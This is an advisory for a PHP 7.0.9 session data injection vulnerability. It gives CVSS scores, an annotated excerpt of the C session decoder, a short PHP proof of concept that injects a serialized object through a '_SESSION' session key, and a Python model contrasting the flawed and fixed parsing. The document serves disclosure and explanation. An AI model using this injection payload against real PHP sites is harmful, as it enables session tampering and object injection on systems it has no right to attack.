PHP 7.0.9 Session Data Injection Vulnerability

2016.09.05
Credit: taoguangchen
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-74


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Description:
------------

PHP Session Data Injection Vulnerability

```c
PS_SERIALIZER_DECODE_FUNC(php) /* {{{ */
{
	...
	while (p < endptr) {
		zval **tmp;
		q = p;
		/* scan forward to the '|' that separates the variable name from its value */
		while (*q != PS_DELIMITER) {
			if (++q >= endptr) goto break_outer_loop;
		}
		if (p[0] == PS_UNDEF_MARKER) {
			p++;
			has_value = 0;
		} else {
			has_value = 1;
		}
		namelen = q - p;
		name = estrndup(p, namelen);
		q++;
		/* reject names that alias $GLOBALS or the session array itself */
		if (zend_hash_find(&EG(symbol_table), name, namelen + 1, (void **) &tmp) == SUCCESS) {
			if ((Z_TYPE_PP(tmp) == IS_ARRAY && Z_ARRVAL_PP(tmp) == &EG(symbol_table)) || *tmp == PS(http_session_vars)) {
				goto skip; /* jumps past the unserialize step without consuming the value */
			}
		}
		...
skip:
		efree(name);
		p = q; /* q still points at the first byte of the unconsumed value */
	}
```

If a session variable name is not allowed, the php session handler ignores and skips the name and resumes parsing at the first byte of its value, without consuming that value. As a result, an attacker who controls a session variable name can inject arbitrary session data. A similar issue exists in the php_binary session handler.

PoC:

```php
<?php
ini_set('session.serialize_handler', 'php');
session_start();
$_SESSION['_SESSION'] = 'ryat|O:8:"stdClass":0:{}';
session_write_close();
session_start();
var_dump($_SESSION);
?>
```
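The decode loop and its fix, modelled in Python as an added example (not PHP's own code): `decode(..., consume_skipped=False)` mirrors the skip-without-consume path above, so the bytes of the rejected value are re-parsed as fresh `name|value` pairs, while `consume_skipped=True` unserializes the value first and only then drops it. The reserved-name set, the tiny serializer (strings and empty objects only) and the stored sample are assumptions of the model.

```python
import re

RESERVED = {"_SESSION", "GLOBALS"}  # names the decoder's check refuses to register

def serialize(value):
    """PHP serialize() for the two types this model supports: str and empty object."""
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode()), value)
    return 'O:%d:"%s":0:{}' % (len(value), value)   # value is the class name

def unserialize(s, pos):
    """Consume exactly one serialized value at s[pos:]; return (value, position after it)."""
    m = re.match(r's:(\d+):"', s[pos:])
    if m:
        start, n = pos + m.end(), int(m.group(1))
        if s[start + n:start + n + 2] != '";':
            raise ValueError("bad string at %d" % pos)
        return s[start:start + n], start + n + 2
    m = re.match(r'O:\d+:"([^"]*)":0:\{\}', s[pos:])   # empty objects only
    if m:
        return ("object", m.group(1)), pos + m.end()
    raise ValueError("unsupported value at %d" % pos)

def encode(session):
    """'php' handler layout: name|value pairs concatenated with no separator."""
    return "".join("%s|%s" % (k, serialize(v)) for k, v in session.items())

def decode(data, consume_skipped):
    """Mirror of the decode loop; consume_skipped=False is the vulnerable behaviour."""
    session, p = {}, 0
    while p < len(data):
        q = data.find("|", p)
        if q < 0:
            break                         # break_outer_loop in the C code
        name, q = data[p:q], q + 1
        if name in RESERVED and not consume_skipped:
            p = q                         # BUG: 'skip' leaves the value unconsumed,
            continue                      # so its bytes become new name|value pairs
        value, q = unserialize(data, q)   # always consume the value ...
        if name not in RESERVED:
            session[name] = value         # ... and register it only if allowed
        p = q
    return session

# Constructed sample: a normal variable plus the advisory's PoC payload under '_SESSION'
STORED = encode({"user": "bob", "_SESSION": 'ryat|O:8:"stdClass":0:{}'})
VULNERABLE = decode(STORED, consume_skipped=False)  # gains key 's:24:"ryat' -> stdClass
HARDENED = decode(STORED, consume_skipped=True)     # {'user': 'bob'}
```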

References:

https://bugs.php.net/bug.php?id=72681
